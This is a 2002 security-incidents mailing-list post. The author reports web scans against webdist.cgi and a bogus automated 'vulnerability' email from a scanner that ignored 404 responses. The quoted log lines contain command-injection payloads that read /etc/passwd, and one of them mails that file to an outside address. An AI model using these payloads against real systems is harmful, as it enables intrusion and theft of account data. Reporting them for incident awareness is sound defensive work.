Security Incidents: Lame website scanner scanning subnets

[zeno <bugtraq () cgisecurity net>]

I got the following scans in my logs yesterday.

68.46.64.23 - - [05/Sep/2002:17:37:37 -0400] "GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.0" 404 2656 
"-" "-"
68.46.64.23 - - [05/Sep/2002:17:44:13 -0400] "GET /cgi-bin/webdist.cgi?/bin/mail%20:/etc/passwd[vuln () threezee com] 
HTTP/1.0" 404 2656 "-" "-"
68.46.64.23 - - [05/Sep/2002:17:49:22 -0400] "GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.0" 404 2656 
"-" "-"

Now I got the following email today. 

> This is an automated message:
>
>    This system was scanned by GoogleMaker 1.0, and is found to have a
> vulnurability.  Please contact a system administrator.
>
>   Vulnurability:  Vulnerability in webdist.cgi
>   Information:    http://www.cert.org/advisories/CA-1997-12.html
>
>
> URGENT - URGENT - URGENT
>
> Thank you,
>  TZSecurity.

What is funny about this is that I do not run this software and they are reporting I do.
Seems this persons scanner can't figure out what 404 codes mean. I am reporting this mostly
for the fact that if they are reporting false information to me they are probably doing so
to others and people should be aware.

Visiting the site I see that it is webattack.com editor's pick. Tip for webattack not to pick
sites who can't tell the difference between 404 and 200.

Regards,


- zeno () cgisecurity com
 
 

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com